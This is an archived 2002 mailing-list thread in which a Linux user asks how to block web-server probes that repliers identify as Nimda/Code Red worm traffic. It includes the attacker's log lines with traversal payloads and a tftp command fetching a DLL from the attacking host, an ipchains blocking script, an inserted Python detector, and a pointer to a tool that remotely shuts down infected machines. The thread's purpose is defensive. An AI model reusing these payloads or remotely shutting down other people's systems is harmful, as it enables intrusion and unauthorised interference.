Re: [newbie] Can't block dos attack

2002-07-30 Thread Ibly Piblo

Many thanks for the info

Hey, where did it talk about remote shutdown?

I saw no such reference.

But I do like the auto-responder
and e-mailing alerter.

I'm trying to figure out how to make it
work.

I will e-mail again when I get some results,
I'm still being hit and I don't know how to
stop them.


__
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] Can't block dos attack

2002-07-28 Thread Ibly Piblo

I am getting strange hits to my web server,
I don't like it and I wish to know how
to stop them from slipping past my defenses.

I try using ipchains, most addresses are
blocked, but for reasons I can't figure out,
this address 65.192.23.150 keeps showing up.

I don't understand it, if ipchains,
/etc/hosts.deny can't block it, what can?

Do I send back a command to shut down
their server?

How do I get the point across?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -




Re: [newbie] Can't block dos attack

2002-07-28 Thread Michael Viron

Try the script below, which should take care of the problem.  Of course,
this isn't a dos attack, it's a virus attack (one of the viruses going
around attempting to infect an iis server).

Which kernel are you using?  If it's 2.4.x, iptables is the way to block
things out.  (in that case let me know, and I'll adapt this to deal with
iptables).

Michael

-- Begin Script --

#!/bin/sh
#
# Block sites which originate Nimda queries from Apache server
# Apache must be configured with HostnameLookups Off
# Adapted from an earlier script found on one of the Mandrake lists
# Changes by Michael Viron
# Last Update: 2/20/2002
LOGS=/var/log/httpd
# Change IP to reflect yours.
DESTINATION=192.168.1.1
BLOCKED=/var/tmp/blocked

cd "$LOGS" || exit 1
touch "$BLOCKED"

# block_pattern REGEX: pull the client IP from every access-log line whose
# request matches REGEX (compared case-insensitively, since IIS paths are)
# and add an ipchains DENY rule for each IP not already listed in $BLOCKED.
# grep -h drops the "filename:" prefix so $1 is always the client address.
block_pattern() {
    grep -h '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
    awk -v pat="$1" 'tolower($0) ~ pat { print $1 }' |
    sort -u |
    while read host
    do
        if ! grep -qxF "$host" "$BLOCKED"
        then
            echo "$host" >> "$BLOCKED"
            /sbin/ipchains -I input -p tcp -s "$host/32" -d "$DESTINATION" 80 -j DENY
            echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >> /etc/ipchains.add
        fi
    done
}

# Request signatures of the Nimda / Code Red family of IIS worms.
block_pattern 'system32/cmd[.]exe'
block_pattern 'scripts/admin[.]dll'
block_pattern 'msadc/admin[.]dll'
block_pattern 'scripts/root[.]exe'
block_pattern 'default[.]ida'

# Make any new rules persistent and reload the chain.
if [ -s /etc/ipchains.add ]
then
    cat /etc/ipchains.add >> /etc/sysconfig/ipchains
    /etc/rc.d/init.d/ipchains restart
fi
rm -f /etc/ipchains.add

-- End Script --



At 05:29 PM 7/28/2002 -0700, you wrote:
I am getting strange hits to my web server,
I don't like it and I wish to know how
to stop them from slipping past my defenses.

I try using ipchains, most addresses are
blocked, but for reasons I can't figure out,
this address 65.192.23.150 keeps showing up.

I don't understand it, if ipchains,
/etc/hosts.deny can't block it, what can?

Do I send back a command to shut down
their server?

How do I get the point across?

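As an added example (not code from the thread), the same detection Michael's shell script performs, written in Python so the decoded request path can be inspected: it unwinds the double-encoded traversal, flags the worm signatures the script greps for, and emits the iptables equivalent of the ipchains rule he offers to adapt for 2.4.x kernels. The sample log lines, the documentation IPs and the iptables DROP form are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Request-path markers of the IIS worms named in the thread (Nimda, Code Red),
# taken from the patterns the posted ipchains script greps for.
SIGNATURES = ("system32/cmd.exe", "/root.exe", "/admin.dll", "default.ida")

# Apache common-log shape quoted in the thread: IP, two dashes, [timestamp],
# then method and path (the request may be double-quoted, per LogFormat).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "?(\S+) (\S+)')

def normalize(path):
    """Undo layered percent-encoding (%255c -> %5c -> backslash) and fold
    backslashes to slashes so every traversal spelling compares alike."""
    for _ in range(3):  # three rounds cover the double encoding seen here
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()

def classify(line):
    """Return (client_ip, matched_signature), or None for a clean line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, raw_path = m.groups()
    path = normalize(raw_path.split("?", 1)[0])  # drop the ?/c+dir query
    for sig in SIGNATURES:
        if sig in path:
            return ip, sig
    return None

def offenders(log_text):
    """Unique client IPs that sent any worm-signature request."""
    hits = (classify(ln) for ln in log_text.splitlines())
    return sorted({h[0] for h in hits if h})

def firewall_rules(ips, destination):
    """iptables (2.4.x kernel) form of the ipchains DENY rule in the thread."""
    return [f"iptables -I INPUT -p tcp -s {ip}/32 -d {destination} --dport 80 -j DROP"
            for ip in ips]

# Constructed sample: two lines in the shape of the thread's log, one benign
# request, and one Code Red style default.ida probe (documentation IPs).
SAMPLE_LOG = """\
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - -
192.0.2.44 - - [28/Jul/2002:18:02:00 -0500] GET /index.html HTTP/1.0 200 1043 - -
203.0.113.9 - - [28/Jul/2002:18:03:12 -0500] "GET /default.ida?NNNNNNNN HTTP/1.0" 404 300
"""
```

Running `firewall_rules(offenders(SAMPLE_LOG), "192.168.1.1")` yields one DROP rule per offending address; feed real log files through `offenders` the same way.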

Re: [newbie] Can't block dos attack

2002-07-28 Thread civileme

Ibly Piblo wrote:

I am getting strange hits to my web server,
I don't like it and I wish to know how
to stop them from slipping past my defenses.

I try using ipchains, most addresses are
blocked, but for reasons I can't figure out,
this address 65.192.23.150 keeps showing up.

I don't understand it, if ipchains,
/etc/hosts.deny can't block it, what can?

Do I send back a command to shut down
their server?

How do I get the point across?



That is no DoS attack--tis the wailing of IIS infected trying to spread 
its misery.  

Go here...  Tis time to meet a friend.

http://pfortin.com/Linux/MSVTS/

And yes the remote shutdown is there.

While you are at it, you might want to make some more new friends

http://plf.zarb.org

Civileme






